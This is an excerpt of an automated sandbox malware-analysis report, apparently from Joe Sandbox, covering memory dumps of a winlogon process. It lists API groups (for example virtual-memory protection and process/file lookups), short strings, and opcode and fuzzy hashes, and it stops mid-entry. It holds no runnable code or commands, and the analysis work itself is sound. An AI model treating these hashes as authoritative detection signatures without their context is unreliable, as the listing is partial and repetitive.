                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: a47289baa3d87ba33f1f88afe4474dab606a4d653d033b248626fe1d2762ccbb
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: FA51C53D214E61E7E765CFAEE84861A73A4F788F86F508519DE4A47B94DF38C845CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                           • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: 54ae065566b4829b781d9018a566345e36c50bff607e782f17c6b7fee4cb4d2a
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: EC51C539254E61A7E765CF9EE84865AB7A1F788B86F608119DE4E83754DF38C805CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                           • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
                                                          • Instruction ID: f391407adbabd6f055ae27f7376641b3a5a98cb01709d5bad2178826b4988af3
                                                          • Opcode Fuzzy Hash: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
                                                          • Instruction Fuzzy Hash: 8E61FC7A12CF50D6E7A0CB99E44831AB7A0F388B4AF108155FA8E43BA8DB7DC544CF01
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction ID: df420bfb6b8bdc2ea69683aacb40dbca2f3a3f392b7c08502304e7a5998fc663
                                                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction Fuzzy Hash: 0561067A129F90D6E760CB99E45831AB7A0F388789F108516FA8D87BE8DB7DC541CF00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                           • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction ID: 2cef1711cbef8828fa7d648f6754db2e6d58f1b8963c7f3555853ad98ac6ec36
                                                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction Fuzzy Hash: FF61C97A129F54D6E760CB99E55831AB7E0F388749F208116FA8E87BA8DB7DC540CF00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: b218463dee67502a835ae951813035202606197bf057287b7ca0e680a927a5f0
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: 60118F2A604B50A3FB24CBA9E40820AA7B0FB44B85F548436DE4D03BE4EB7EC944C781
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                           • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: c8547797954554ffa4e78551a709827f54cf49ca4e02fd7e96956fd5fd9b6fc5
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: 6011822A618B50A3EB64CB69E40824AA7B1FB58B82F148036EE4D43794EB7DC944C780
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                           • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 2395640692-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 4ae307845288fb3d062ff6b21d3b2bdd9a53696f29506425ff8a95e7ae8c6e8c
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 3951B23A31EE20AADB54CB9DE44CB6D7791E358B99F14C261DA4B87788DB79C842C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                           • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 2395640692-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: e3f065706f0033cd9b367c7da221b193a0613518b7070d47f270ab554b71a793
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 5A51C73A311E20AADB54CB9DD44CB6C7791F758B9AF14CA11EA4957BC8E778CC42C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 2395640692-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 2212d634079747aafaa89bb439a841dab367c477c17d881e86c43961d0c77b4d
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 5351C63A311E20EADB54DB9DE44CB6C7791F358B9AF24C221DA4A87788DB79C842C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 05d6541485a4cde5682c01a5d603653128390d7577d40c8f6b44cab3c99e28d3
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: 3461CE7A50CFC4A5EB318F59E4443DAB7A0F785B99F148215EB9A13B9ADB3CC091CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: 8c8bc4a70ab599d9620bd1be4db269998e674a49f348e955b95b8174a160fc55
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 1B51923A10CB50BBEBB48F99954C35877A1F354F96F24C196EA8A47BD6CB38C451C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 2695b427674d9b1f0b090cd8166b492a7e798804cf5713d6c1bd31e74a038d40
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: D261AD3A508BC491EB20CF69E44479AB7A0F785B99F149A15EB9813F9ADB7CC191CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: 9600a415d1908e86b08cbf43e1cb8adef971c7a7c32f46f5b13ec36b108122a0
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 5951C33A200BA0EBEB748FA9D54835877A0F354F96F24E616EA9947FD6CB38C451C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: e2d1a1c78e90f6bd31deacbcec7c4600ee4de40aa8066d79be5c97a9c682ef8a
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: CA61D276508FD495DB30CF59E44439AB7A0F784B85F248216EBD853B9ADB3CC095CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: d971139fb05815a79728a67a4b08760c6fbe338f4faaf200783333ac6c2a95e7
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 4D518E3A200A90ABEB74CFA9D54835877A1F354F96F34C117EA8A87BD6CB38D451CB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: ff996069689e9adb4c39c6e894924d3e7f7579bacb489373341fae83957afcfd
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 5851B23A206B90AEEF748FA9D14835C77A0F355B9BF24C215EA8947BD6CB38D451CB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction ID: 3c8fe4181d57bde8610dc56ea65077bbac2591f1a464c2d41b7e5703e34ab205
                                                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction Fuzzy Hash: EA11511931CFA5B1EB109BA9E80835A72A4F749B82FA48075AE4A93695FF78C945C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction ID: 95432dd9826d381225eec497ac909ebfc8931623513a31093e2cfea6e35b5e9a
                                                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction Fuzzy Hash: F6115719314FA172FF10DBA9E80935A53A4FB44B82FA48935AE4983AD5FF78C905C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction ID: df98b87962186eb4fc5c7e3438245a12adda9e9b458913ece3bf6b2c649ca0b3
                                                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction Fuzzy Hash: 54115419314FB1B2EB10DBA9E80939A63A4FB55B82FA48035AF49C3795FF78C905C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
